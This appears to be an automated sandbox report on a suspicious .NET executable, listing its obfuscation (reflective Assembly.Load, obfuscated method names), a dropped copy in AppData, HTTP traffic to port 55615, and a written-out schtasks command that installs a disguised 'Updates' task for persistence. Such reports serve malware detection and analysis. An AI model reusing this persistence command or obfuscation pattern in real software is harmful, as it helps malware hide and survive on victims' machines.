                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Uv4EriqDCj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Uv4EriqDCj.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, Vscex5Iopq1ThZ6EeC.cs.Net Code: UgWNUvijjn System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_04F09500 push dword ptr [ecx+ecx-75h]; iretd 0_2_04F0951A
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AAB250 pushfd ; ret 0_2_05AAB251
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AAEF6D push FFFFFF8Bh; iretd 0_2_05AAEF6F
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AAEE72 push dword ptr [ebx+ebp-75h]; iretd 0_2_05AAEE7D
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECCE66 push es; iretd 0_2_06ECCE70
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECCFEE push es; retf 0_2_06ECD010
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC7FC7 push es; iretd 0_2_06EC7FF8
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECCF62 push ebx; ret 0_2_06ECCF75
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC7B60 push cs; ret 0_2_06EC7B61
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC5B4D push es; retf 0_2_06EC5B6C
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC5B01 push es; retf 0_2_06EC5B6C
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC8003 push es; iretd 0_2_06EC7FF8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A78073 push es; iretd 10_2_06A77FF8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7CE67 push es; iretd 10_2_06A7CE70
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7DF8C push edx; ret 10_2_06A7DF90
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7CFEF push es; retf 10_2_06A7D010
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A77FF7 push es; iretd 10_2_06A77FF8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7CF63 push ebx; ret 10_2_06A7CF75
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A75B01 push es; retf 10_2_06A75B6C
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A77B60 push cs; ret 10_2_06A77B61
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A75B4D push es; retf 10_2_06A75B6C
                  Source: Uv4EriqDCj.exeStatic PE information: section name: .text entropy: 7.941673576777486
                  Source: nXUcBcEOyROdbV.exe.0.drStatic PE information: section name: .text entropy: 7.941673576777486
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, Vscex5Iopq1ThZ6EeC.csHigh entropy of concatenated method names: 'yRkJS1rr9h', 'MEQJhlTVfC', 'gHwJs5LlEC', 'U4oJeu3V4B', 'zUEJiNF0CS', 'TJOJcqphWa', 'W91JENvAeP', 'BP2JIR5bvD', 'aPJJlk1YgN', 'AImJZMYeso'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, ibET0gsLEAuElNRuY8.csHigh entropy of concatenated method names: 'Dispose', 'ufBvaUrXU1', 'G2vbRyj6mm', 'YklHSHfEnO', 'Eyav0KZ8UT', 'CTbvz3pJWD', 'ProcessDialogKey', 'N7mbui0dt2', 'EUDbve3lWh', 'flbbbR1d0H'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, jMpfiDOsyVHmsQa7XA.csHigh entropy of concatenated method names: 'IqHrgeSFOu', 'eZ0r3BiUoT', 'TyArAWlavG', 'AbUrRTUTXH', 'b3frkMGoUc', 'Da5rMiobcY', 'T5rrHi1kBU', 'CrVrCtPJCE', 'aehrVU9yVD', 'E8Sr5a7hxG'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, ni0dt2a3UDe3lWhhlb.csHigh entropy of concatenated method names: 'byJBAjj4KM', 'y3rBRg5in8', 'w2XBt4n0mb', 'h1BBkJV9WD', 'WoABM01PC5', 'TiuBLxTIcD', 'fOtBHmlg3F', 'x57BCs9Rvn', 'njRBTuItw5', 'SITBVjlLGe'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, xKbJVavNVOBoqeu5adw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AYSWBN7CW7', 'lnQW1j5WHK', 'Sa3W6olsZu', 'GidWWx3Sk5', 'qtJWPcjJe1', 'myOWxv6rU7', 'WVSWfOuLMf'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, HoguGEvuBO3R2tu4hoj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LDN15UuHrs', 'DmI1nVerhX', 'wpm1OD5ZGf', 'eww1KjxjYp', 'qgK1p1Agf6', 'VDI1jLg9Ii', 'qMU1X0OGAW'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, G1d0Hl0Iu0RlYfvKfd.csHigh entropy of concatenated method names: 'omA1eX2qE5', 'c6Q1i5G2lC', 'Cgd1cpKb4J', 'M3I1E4LsHl', 'iGw1B9NuQt', 'lQB1IAOFH6', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, u3lBon7ar626qMZlYx.csHigh entropy of concatenated method names: 'tmMFo6B7G2', 'PkKF0wq9aw', 'GHfduA18SE', 'wTQdvwlVyx', 'i2KF5qjCCC', 'tlPFnA0Knu', 'kmyFOUilyv', 'nNOFKTuLg5', 'sS3FpYq2rg', 'mxxFjRcNO7'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, NWDNKY273PfBUrXU13.csHigh entropy of concatenated method names: 'bSrBDfmBDH', 'UI7BF41N1E', 'hlmBBsE0xK', 'B5EB6wqZy9', 'Ko9BPvhWdW', 'l5fBf54T4M', 'Dispose', 'DaFdh4g5CY', 'OmUdsCyYoE', 'DjudeD4FAw'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, Qx4C3oAJtMolyG6yMk.csHigh entropy of concatenated method names: 'NTGcSZMVwZ', 'C28cs9owEg', 'OLbciYECsT', 'VtocEnFIuF', 'rcvcIfHIkK', 'oWfi9WHl8A', 'P3Ci7i2lPG', 'XFui28HcsV', 'hqQioQjJt2', 'CDViaZyuA1'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, AwR1KqXofWGGt7aq0e.csHigh entropy of concatenated method names: 'eofFZVX2cR', 'RdcFmYdAUv', 'ToString', 'u2aFhr1cUk', 'BflFsnDP3U', 'tibFefMZKj', 'Nh8FiQ8R1t', 'UCOFcxBKKw', 'GHHFEkXv3g', 'Gf8FI6qUfC'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, mJ4ZjUb1xJZ6QyXSm4.csHigh entropy of concatenated method names: 'lsNUmBK7U', 'AnGYUWMjq', 'bDFGJV8lF', 'EsFqmfURE', 'rk03b6S3f', 'qoBwlQQtS', 'q4dCYZKFlq15ZJaCc8', 'bAAgkGhId0isP47KZY', 'oM1d9Yl12', 'rfE1da4Ue'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, kqRJKB3uSpIyUEvbgb.csHigh entropy of concatenated method names: 'prYeYF3BEF', 'GoceG0HY6B', 'nDxeggRZ5u', 'ut5e3LyCVn', 'wPIeDYawhH', 'spHeQnvCef', 'vxGeFtfTgY', 'AuHedglbWU', 'FFeeBPtE17', 'QUqe1XyopP'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, WyIlRoKR16qfhE0o2q.csHigh entropy of concatenated method names: 'IU8DVcKoE9', 'KbfDnOdKD3', 'YfNDK24qro', 'uWTDp5Xodm', 'CVvDRV4Ty6', 'sawDtkWq01', 'WJ4DkUhaj6', 'cfqDMWX6xj', 'j6CDLh5n7c', 'aKgDHjeXOs'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, xHuvUyzoPdvle88bwF.csHigh entropy of concatenated method names: 'S5p1G9RXKx', 'tdi1g8DApV', 'g9T13KMNlm', 'Ejt1A4Jynj', 'da01RILCGD', 'M811kGt98M', 'ra41M9KUVf', 'YQv1ftTwaI', 'WoU183av1r', 'Ja214L8jB0'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, xjUj5Tg4fmJ50sNaKH.csHigh entropy of concatenated method names: 'hQvsK5VCLH', 'EBXspOVPUJ', 'gfWsjje9Hv', 'yeusXsZCqp', 'nmCs9xMv04', 'oMms7AHTVY', 'NVbs2QDhgH', 'T7Fsok0Bqr', 'Cw5saseK0o', 'zGps085XRb'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, C3wb7QeiZiRI5B8171.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'aQkbaCw4o9', 'HRfb0MZq3T', 'u5WbzjK8go', 'XlpJu8myKc', 'LcAJvXYcBY', 'WJ9JbeNgOx', 'gmHJJ8QJMM', 'blcasEvR19SQq1p9OAF'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, WnsQV4NJEEqvu7lTTV.csHigh entropy of concatenated method names: 'lp8vEjUj5T', 'yfmvIJ50sN', 'ruSvZpIyUE', 'bbgvmbiJKA', 'rxtvDtZOx4', 'M3ovQJtMol', 'XDASAD988UmaxwEsv1', 'p6lGVAOhKO7xH7BClU', 'pIbvvw569o', 'lnZvJRHW8m'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, I6UFl4vv1yHnFHxOAm3.csHigh entropy of concatenated method names: 'eVs10Fjo1F', 'KwG1z4Xya4', 'EV36uImi0v', 'mb66vL9yL1', 'OIe6b2Woy6', 'aHU6JU66kJ', 'aMJ6NNC0L2', 'DJu6S8xXYO', 'j2I6hrGPu5', 'brI6sTisUn'
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, dyZpRoTXpm92No9KIG.csHigh entropy of concatenated method names: 'w0OE8Xn2rf', 's3JE4YuMgF', 'MyrEUUDtgH', 'tZBEYoJKKX', 'iGREyfyGhU', 'NKTEGr5UnK', 'FLAEqIp7aR', 'XsuEgaKUYF', 'AZlE3VKkQj', 'al8Ewrw9BL'
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49750
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
